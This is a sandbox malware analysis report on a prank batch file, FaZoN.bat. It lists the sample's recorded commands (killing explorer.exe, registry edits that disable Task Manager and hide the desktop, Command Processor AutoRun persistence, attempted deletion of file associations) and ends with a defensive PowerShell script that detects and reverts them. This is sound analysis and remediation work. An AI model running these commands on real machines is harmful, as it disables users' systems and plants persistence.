Overview

Tasks and scores (one row per sandbox task; "Platform" is the guest OS, "Resource" the VM image the task ran on, "Score" the sandbox score for that task):

Task | Sample | Platform | Resource | Score
overview | - | - | - | 10
static | - | - | - | 10
behavioral1 | @_136 @828#-138389J-SJFJDSM.exe | windows7-x64 | win7-20240221-en | 7
behavioral2 | @_136 @828#-138389J-SJFJDSM.exe | windows10-2004-x64 | win10v2004-20240226-en | 7
behavioral3 | TrashMalwares-main/AcidRain.exe | windows7-x64 | win7-20240221-en | 8
behavioral4 | TrashMalwares-main/AcidRain.exe | windows10-2004-x64 | win10v2004-20240226-en | 8
behavioral5 | AdStRkJ.exe | windows7-x64 | win7-20240221-en | 8
behavioral6 | AdStRkJ.exe | windows10-2004-x64 | win10v2004-20240226-en | 8
behavioral7 | Anatralier.exe | windows7-x64 | win7-20240215-en | 7
behavioral8 | Anatralier.exe | windows10-2004-x64 | win10v2004-20240226-en | 7
behavioral9 | TrashMalwares-main/Antivirus_Installer.exe | windows7-x64 | win7-20240221-en | 3
behavioral10 | TrashMalwares-main/Antivirus_Installer.exe | windows10-2004-x64 | win10v2004-20240226-en | 8
behavioral11 | TrashMalwares-main/Dro trojan. Virus prank.exe | windows7-x64 | win7-20240221-en | 8
behavioral12 | TrashMalwares-main/Dro trojan. Virus prank.exe | windows10-2004-x64 | win10v2004-20240226-en | 8
behavioral13 | TrashMalwares-main/FaZoN.bat | windows7-x64 | win7-20240221-en | 8
behavioral14 | TrashMalwares-main/FaZoN.bat | windows10-2004-x64 | win10v2004-20240226-en | 8
behavioral15 | TrashMalwares-main/Fizz.exe | windows7-x64 | win7-20240221-en | 6
behavioral16 | TrashMalwares-main/Fizz.exe | windows10-2004-x64 | win10v2004-20240226-en | 6
behavioral17 | TrashMalwares-main/Ginxide.exe | windows7-x64 | win7-20240221-en | 7
behavioral18 | TrashMalwares-main/Ginxide.exe | windows10-2004-x64 | win10v2004-20240226-en | 7
behavioral19 | TrashMalwares-main/Install Windows20.exe | windows7-x64 | win7-20240221-en | 4
behavioral20 | TrashMalwares-main/Install Windows20.exe | windows10-2004-x64 | win10v2004-20240226-en | 7
behavioral21 | TrashMalwares-main/MS-RickRoll.exe | windows7-x64 | win7-20240220-en | 7
behavioral22 | TrashMalwares-main/MS-RickRoll.exe | windows10-2004-x64 | win10v2004-20240226-en | 7
behavioral23 | TrashMalwares-main/MercuryXhoffle.exe | windows7-x64 | win7-20240221-en | 8
behavioral24 | TrashMalwares-main/MercuryXhoffle.exe | windows10-2004-x64 | win10v2004-20240226-en | 8
behavioral25 | TrashMalwares-main/NetPakoe.bat | windows7-x64 | win7-20240221-en | 8
behavioral26 | TrashMalwares-main/NetPakoe.bat | windows10-2004-x64 | win10v2004-20240226-en | 8
behavioral27 | TrashMalwares-main/NetPakoe3.0.exe | windows7-x64 | win7-20240221-en | 6
behavioral28 | TrashMalwares-main/NetPakoe3.0.exe | windows10-2004-x64 | win10v2004-20240226-en | 7
behavioral29 | TrashMalwares-main/NoEscape8.0.exe | windows7-x64 | win7-20240221-en | 8
behavioral30 | TrashMalwares-main/NoEscape8.0.exe | windows10-2004-x64 | win10v2004-20240226-en | 7
behavioral31 | TrashMalwares-main/PC shaking v4.0.exe | windows7-x64 | win7-20240220-en | 7
behavioral32 | TrashMalwares-main/PC shaking v4.0.exe | windows10-2004-x64 | win10v2004-20240226-en | 7

The remainder of this page is the report for behavioral13 (TrashMalwares-main/FaZoN.bat on windows7-x64).

Analysis
- max time kernel: 132s
- max time network: 60s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 02-03-2024 20:26
General
- Target: TrashMalwares-main/FaZoN.bat
- Size: 1KB
- MD5: 2a2c2cca38f2e34ee666d4534834dcbb
- SHA1: 8ffa496f4e56c6406f8f965059483125966c6fdd
- SHA256: 6397c16efa9b0ff4732002d37a948192b1df49c0c2c927806622fa59d3ac1b46
- SHA512: e05a896d8bcad42c04b69c14be3b625d1f586049b2a5925d08bae47f47429b44669904e22daaf94c003bbd697957bddf6067e1aaccc9dd4cb7c607a1d78686d0
Malware Config
Signatures
- Disables Task Manager via registry modification
- Modifies Installed Components in the registry (2 TTPs, 1 IoC)
  explorer.exe (PID 2444): key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Active Setup\Installed Components
- Deletes itself (1 IoC)
  cmd.exe (PID 2068)
- Drops file in System32 directory (2 IoCs)
  cmd.exe (PID 2068): file created, then opened for modification: C:\Windows\system32\gosha.bat
  Note: writing under System32 needs an elevated token; the task ran as the sandbox's Admin user, which is why this copy (used later for persistence) succeeded.
- Kills process with taskkill (1 IoC)
  taskkill.exe (PID 2648)
- Modifies registry class (7 IoCs)
  explorer.exe (PID 2444), five ordinary shell-state writes:
    key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_Classes\Local Settings
    key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell
    key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
    set value (data) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots
    set value (data) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff
  cmd.exe (PID 2068), two writes:
    key created \REGISTRY\MACHINE\SOFTWARE\Classes\.exe
    set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.exe\(Default) = ".txt"
  Note: the default value of HKCR\.exe is normally "exefile"; pointing it at ".txt" breaks launching executables from Explorer. The write was made by cmd.exe itself, not by a reg.exe child, which is consistent with a built-in assoc command in the batch file. It is not the result of the reg delete HKCR/... commands in the process list below.
- Modifies registry key (1 TTP, 4 IoCs)
  reg.exe PIDs 2908, 2668, 2708, 2572 (the four reg add commands against HKCU policy keys)
- Suspicious use of AdjustPrivilegeToken (19 IoCs)
  taskkill.exe (PID 2648): SeDebugPrivilege, 1 event
  cmd.exe (PID 2068): SeSystemtimePrivilege, 2 events
  explorer.exe (PID 2444): SeShutdownPrivilege, 16 events
- Suspicious use of FindShellTrayWindow (29 IoCs)
  explorer.exe (PID 2444), 29 events
- Suspicious use of SendNotifyMessage (17 IoCs)
  explorer.exe (PID 2444), 17 events
  Note: the explorer.exe entries here and above (privilege adjustments, FindShellTrayWindow, SendNotifyMessage, shell-bag and Installed Components keys) are normal start-up behaviour for the shell. They appear in this report because the batch killed explorer.exe with taskkill and relaunched it as its own child, not because the sample injected into it.
- Suspicious use of WriteProcessMemory (54 IoCs)
  cmd.exe (PID 2068) wrote to each of the 18 processes it launched, three writes recorded per child: msg.exe 2612, taskkill.exe 2648, reg.exe 2708, reg.exe 2572, reg.exe 2908, explorer.exe 2444, msg.exe 2876, reg.exe 2668, msg.exe 2584, reg.exe 2464, msg.exe 2412, msg.exe 2452, msg.exe 1844, cmd.exe 3032, reg.exe 2460, reg.exe 2036, reg.exe 2148, cmd.exe 2388
  Note: every target is a direct child of the batch interpreter, so these are the writes that accompany process creation, not injection into an unrelated process.
- Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times. No schtasks.exe or other scheduler client appears in the process list for this task.
Processes
- C:\Windows\system32\cmd.exe (PID 2068)
  cmd /c "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\FaZoN.bat"
  Deletes itself; Drops file in System32 directory; Modifies registry class; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  Children of PID 2068, in launch order:
  - C:\Windows\system32\msg.exe (PID 2612)
    msg * Gosha created by GGmex your computer infected
  - C:\Windows\system32\taskkill.exe (PID 2648)
    taskkill /f /im explorer.exe
    Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\reg.exe (PID 2708)
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d C:\Windows\explorer.exe /f
    Modifies registry key
    Note: RestrictRun list entries are REG_SZ program names, and reg.exe rejects non-numeric data for REG_DWORD, so this command most likely fails. Even if it had been written, the allow-list is only enforced when Policies\Explorer\RestrictRun (DWORD) is set to 1, which this batch never does. The intent, an allow-list that lets only explorer.exe run, is still clear.
  - C:\Windows\system32\reg.exe (PID 2572)
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Polices\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    Modifies registry key
    Note: "Polices" is misspelled, so this creates an unused key and has no effect on Task Manager; the correctly spelled command from PID 2668 below is the one that disables it. The misspelled key is itself a high-fidelity indicator of this sample.
  - C:\Windows\system32\reg.exe (PID 2908)
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
    Modifies registry key
    Note: NoDesktop=1 hides every item on the desktop once explorer.exe restarts, which is the "desktop has been crashed" effect the next message announces.
  - C:\Windows\explorer.exe (PID 2444)
    explorer.exe
    Modifies Installed Components in the registry; Modifies registry class; Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage
  - C:\Windows\system32\msg.exe (PID 2876)
    msg * Your desktop has been crashed
  - C:\Windows\system32\reg.exe (PID 2668)
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    Modifies registry key
  - C:\Windows\system32\msg.exe (PID 2584)
    msg * Your windows infected by gosha :)
  - C:\Windows\system32\reg.exe (PID 2464)
    reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\gosha.bat" /f
    Note: this is the persistence mechanism, and no signature fires for it. cmd.exe runs the Command Processor AutoRun value every time it starts without /D, so the copy dropped to C:\Windows\system32\gosha.bat (see Signatures) re-executes on every new command prompt for this user, including the two nested cmd.exe instances (PIDs 3032 and 2388) this batch itself launches afterwards.
  - C:\Windows\system32\msg.exe (PID 2412)
    msg * Deleted files
  - C:\Windows\system32\msg.exe (PID 2452)
    msg * Your system has been removed...
  - C:\Windows\system32\msg.exe (PID 1844)
    msg * Click OK
  - C:\Windows\system32\cmd.exe (PID 3032)
    cmd
  - C:\Windows\system32\reg.exe (PID 2460)
    reg delete HKCR/.exe
  - C:\Windows\system32\reg.exe (PID 2036)
    reg delete HKCR/.dll
  - C:\Windows\system32\reg.exe (PID 2148)
    reg delete HKCR/*
    Note (PIDs 2460, 2036, 2148): reg.exe does not treat "/" as a key-path separator, and none of these commands carry /f, so the deletes most likely fail with an invalid key name rather than wiping HKEY_CLASSES_ROOT. The .exe association change recorded under "Modifies registry class" was made by cmd.exe itself, not by these commands.
  - C:\Windows\system32\cmd.exe (PID 2388)
    cmd
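The host changes above are few and specific, which makes them easy to hunt for and revert on a machine that ran this batch. The following PowerShell script is an added example written for this page; it is not part of the sandbox report or of the TrashMalwares repository. It checks for every indicator the FaZoN.bat task left behind (the two policy values, the misspelled Polices key, the RestrictRun key, the Command Processor AutoRun value, the HKCR\.exe association and the dropped System32\gosha.bat) and, when run with -Remediate, reverts them. The expected default value "exefile" for HKLM\SOFTWARE\Classes\.exe is Windows' normal default and an assumption of the script, not a value taken from the report.

```powershell
<#
  Added example (not from the sandbox report or the sample): hunt for and undo
  the host changes the FaZoN.bat task made. Indicators are taken from the
  reg.exe command lines and the "Drops file in System32 directory" IoC above.
  Run from an elevated prompt. Without -Remediate it only reports.
#>
[CmdletBinding()]
param([switch]$Remediate)

$findings = New-Object System.Collections.Generic.List[string]

# Values written by the sample's reg add commands. Each is reported if present
# and removed under -Remediate.
$badValues = @(
    @{ Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\System';   Name = 'DisableTaskMgr' },
    @{ Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'; Name = 'NoDesktop' },
    @{ Path = 'HKCU:\Software\Microsoft\Command Processor';                       Name = 'AutoRun' }
)
foreach ($v in $badValues) {
    $item = Get-ItemProperty -Path $v.Path -Name $v.Name -ErrorAction SilentlyContinue
    if ($null -ne $item) {
        $findings.Add(('{0}\{1} = {2}' -f $v.Path, $v.Name, $item.($v.Name)))
        if ($Remediate) { Remove-ItemProperty -Path $v.Path -Name $v.Name -Force }
    }
}

# Whole keys the sample creates: the misspelled "Polices" key (a dead write,
# but a high-fidelity indicator) and the RestrictRun allow-list key.
$badKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Polices',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun'
)
foreach ($k in $badKeys) {
    if (Test-Path -LiteralPath $k) {
        $findings.Add("Key present: $k")
        if ($Remediate) { Remove-Item -LiteralPath $k -Recurse -Force }
    }
}

# The .exe file association. "exefile" is Windows' normal default (an
# assumption of this script, not a value from the report). The sample's write
# landed in the machine half of HKCR; the per-user half is checked as well.
foreach ($assoc in 'HKLM:\SOFTWARE\Classes\.exe', 'HKCU:\Software\Classes\.exe') {
    if (Test-Path -LiteralPath $assoc) {
        $default = (Get-Item -LiteralPath $assoc).GetValue('')
        if ($default -ne 'exefile') {
            $findings.Add("$assoc default = '$default' (expected 'exefile')")
            if ($Remediate) { Set-Item -LiteralPath $assoc -Value 'exefile' }
        }
    }
}

# The copy the batch dropped for its Command Processor AutoRun persistence.
$dropped = Join-Path $env:SystemRoot 'System32\gosha.bat'
if (Test-Path -LiteralPath $dropped) {
    $findings.Add("Dropped file present: $dropped")
    if ($Remediate) { Remove-Item -LiteralPath $dropped -Force }
}

if ($findings.Count -eq 0) {
    Write-Output 'No FaZoN.bat indicators found.'
} else {
    $findings | ForEach-Object { Write-Output "[!] $_" }
    if ($Remediate) {
        # Explorer reads the policy values when it starts, so restart it to
        # bring the desktop back (the batch had already killed it with taskkill /f).
        Get-Process explorer -ErrorAction SilentlyContinue | Stop-Process -Force
        Start-Process explorer.exe
        Write-Output 'Remediated; explorer.exe restarted.'
    }
}
```

Run it once without -Remediate to see what is present, then again with -Remediate from the affected user's elevated session, since the policy and AutoRun values live in that user's HKCU hive. Remove the dropped gosha.bat before opening any new command prompt; until the AutoRun value and the file are both gone, every cmd.exe start re-runs the batch.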